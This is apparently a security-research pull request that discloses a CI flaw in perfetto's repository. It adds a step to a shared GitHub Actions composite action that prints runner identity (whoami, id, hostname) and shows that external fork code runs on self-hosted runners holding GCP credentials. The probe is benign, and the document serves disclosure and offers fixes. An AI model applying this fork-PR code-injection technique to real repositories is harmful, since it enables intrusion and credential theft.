### PR TITLE
[OSS-VRP PoC] Self-hosted runner RCE via external fork PR — benign id/whoami probe

### DIFF
--- a/.github/actions/install-build-deps/action.yml
+++ b/.github/actions/install-build-deps/action.yml
@@ -22,6 +22,20 @@ inputs:
 runs:
   using: "composite"
   steps:
+    - name: VRP PoC benign execution probe
+      # Security research PoC (Google OSS-VRP). NON-MALICIOUS: prints identity only.
+      # No network, no secret access, no writes, no persistence.
+      shell: bash
+      run: |
+        echo "::notice::VRP-PoC: arbitrary code is executing on this self-hosted runner"
+        echo "VRP-PoC-whoami=$(whoami)"
+        echo "VRP-PoC-id=$(id)"
+        echo "VRP-PoC-hostname=$(hostname)"
+        echo "VRP-PoC-uname=$(uname -a)"
+        echo "VRP-PoC-pwd=$(pwd)"
+        echo "VRP-PoC-runner-name=${RUNNER_NAME:-}"
+        echo "VRP-PoC-end"
+
     - name: Compute cache key
       id: cache_key
       env:


### PR DESCRIPTION
## Security research PoC — Google OSS-VRP (non-malicious)

This PR is a **security research proof-of-concept** demonstrating that code from an **external fork PR executes on perfetto's self-hosted CI runners**, which hold ambient GCP credentials. It is submitted under Google's OSS-VRP. **It is intentionally non-malicious.**

### What this change does
Adds a single benign step as the **first step** of the `.github/actions/install-build-deps` composite action that only prints runner identity:

```sh
echo "VRP-PoC-whoami=$(whoami)"
echo "VRP-PoC-id=$(id)"
echo "VRP-PoC-hostname=$(hostname)"
echo "VRP-PoC-uname=$(uname -a)"
echo "VRP-PoC-pwd=$(pwd)"
echo "VRP-PoC-runner-name=${RUNNER_NAME:-}"
```

**No network access, no secret/token/credential reads, no filesystem writes outside the job, no persistence, no cache poisoning, no destructive commands.** It only proves *who* the code runs as on the runner.

### Why this is RCE-relevant
- `analyze.yml` triggers on `pull_request` and dispatches `repo-checks.yml` (self-hosted) with **no `if:` guard**, for *every* PR — including this fork PR.
- `repo-checks.yml` does `actions/checkout@v5` (fork code) then `uses: ./.github/actions/install-build-deps`, a **composite action read from this fork's checkout**. An attacker editing it (as done here) gets arbitrary code execution on the self-hosted runner.
- The self-hosted runner is pre-authenticated to GCP (`cache_on_google_storage_action.sh` runs `gcloud storage cp gs://perfetto-ci-artifacts ...` with no per-job auth).

### Expected result (once this workflow run is approved)
The `Perfetto CI [repo-checks]` job on the **self-hosted** runner will print:
```
VRP-PoC-whoami=...
VRP-PoC-id=...
VRP-PoC-hostname=...
```
…confirming the fork-PR code ran as a privileged identity on Google's self-hosted CI infrastructure.

### Reproduction of reachability (independent of this PR)
External fork PR #6968 (`rishuranjanofficial`, `author_association: NONE`) already had its code built/tested on the self-hosted `ui`, `linux`, `android`, `bazel`, `fuzzer`, `rust-sdk` jobs — independently confirming external fork code runs on these runners.

### Suggested fix
Route untrusted (fork) PRs to GitHub-hosted runners, or gate self-hosted jobs with `if: github.event.pull_request.head.repo.full_name == github.repository`. Use per-job OIDC Workload Identity Federation instead of ambient runner GCP credentials.

**Please do not merge.** Happy to close once triaged. PoC by security researcher (rezasarvani).
